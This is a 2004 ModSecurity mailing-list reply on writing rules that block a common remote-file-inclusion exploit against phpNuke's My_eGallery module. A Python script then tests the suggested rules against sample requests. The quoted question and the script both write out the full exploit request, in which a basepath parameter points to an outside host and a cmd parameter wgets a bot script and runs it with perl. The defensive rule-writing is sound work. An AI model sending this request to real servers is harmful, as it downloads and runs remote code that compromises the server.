Re: [mod-security-users] rule for common My_eGallery exploit
From: Ivan R. <iv...@we...> - 2004-08-23 12:30:02
Hugh Beaumont wrote:
> Hi,
>
> Does anyone have a good rule to catch the following types of requests:
>
> GET
> /modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt
>
> This is a very common exploit against phpnuke's eGallery module.
>
> I am new to mod_security and am not sure what the best rule would be to block these requests
> without also blocking other requests with the word basepath in it.
>
> I think the key part would be something like:
>
> block everything with the string:
>
> ?basepath
>
> or
>
> ?basepath=http
>
> Any ideas?

Assuming the basepath parameter is not supposed to be used from the outside at all, the correct approach is to reject all requests that contain this parameter:

SecFilterSelective ARG_basepath "!^$"

If there are valid cases where this parameter is used then you'll need to give us some examples of valid uses. We could then create a rule that accepts only valid (safe) requests and rejects attacks.

If the only way to exploit the application is by fetching and executing a remote page then a simple:

SecFilterSelective ARG_basepath "!http:"

will probably do. But I suspect users can also use the basepath parameter to read arbitrary files from the server, which is probably something you don't want either.

--
ModSecurity (http://www.modsecurity.org)
[ Open source IDS for Web applications ]
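As an added illustration (not part of the thread and not ModSecurity code), the following Python simulates the two parameter-scoped rules from the reply and the asker's naive "?basepath" substring idea against constructed sample requests, so the difference in false positives and in coverage of non-URL basepath values is visible. The query parsing is an approximation of how ModSecurity exposes ARG_<name>, and the remote-page check is written as the reply describes it, matching `http:` in the parameter value.

```python
from urllib.parse import unquote

# Constructed sample request targets. The first is the exploit pattern quoted
# in the thread; the others are benign or local-path requests that show how
# the candidate rules differ.
SAMPLE_REQUESTS = [
    "/modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?"
    "&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt",
    "/modules/My_eGallery/public/displayCategory.php?cid=3",          # normal use
    "/help.php?basepath_help=1",                                       # different parameter name
    "/search.php?q=%3Fbasepath%3Dhttp",                                # word inside another value
    "/modules/My_eGallery/public/displayCategory.php?basepath=",       # present but empty
    "/modules/My_eGallery/public/displayCategory.php?basepath=/some/local/dir",  # non-URL value
]

def query_args(target):
    """Parse the query string into {name: decoded value}, keeping the first
    occurrence of each name. Approximates how ModSecurity exposes ARG_<name>."""
    args = {}
    for pair in target.partition("?")[2].split("&"):
        if pair:
            name, _, value = pair.partition("=")
            args.setdefault(unquote(name), unquote(value))
    return args

def rule_reject_any_basepath(target):
    """SecFilterSelective ARG_basepath "!^$": reject when basepath is present
    and non-empty; requests without the parameter are untouched."""
    value = query_args(target).get("basepath")
    return value is not None and value != ""

def rule_reject_remote_basepath(target):
    """Narrower rule from the reply: reject only when basepath points at a
    remote page (its decoded value contains "http:")."""
    value = query_args(target).get("basepath")
    return value is not None and "http:" in value

def naive_substring(target):
    """The asker's first idea: block anything containing the text '?basepath'."""
    return "?basepath" in unquote(target)

def evaluate(target):
    """Return which of the three checks would reject this request."""
    return {
        "any_basepath": rule_reject_any_basepath(target),
        "remote_basepath": rule_reject_remote_basepath(target),
        "naive_substring": naive_substring(target),
    }

if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(evaluate(req), req)
```

The last sample shows the caveat in the reply: a basepath that is a local path passes the "http:" rule but is still rejected by the "!^$" rule.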